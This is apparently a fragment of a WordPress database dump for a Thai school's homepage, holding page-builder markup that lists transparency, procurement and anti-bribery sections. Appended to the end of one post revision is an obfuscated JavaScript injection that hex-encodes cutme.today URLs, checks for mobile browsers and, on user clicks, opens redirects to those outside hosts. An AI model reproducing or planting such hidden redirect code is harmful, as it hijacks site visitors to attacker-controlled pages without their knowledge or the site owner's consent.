900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 11:40:46','2024-07-27 04:40:46','',14,'http://pakhaeng.ssk.in.th/?p=101',0,'revision','',0),
(102,1,'2024-07-27 11:43:35','2024-07-27 04:43:35','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button 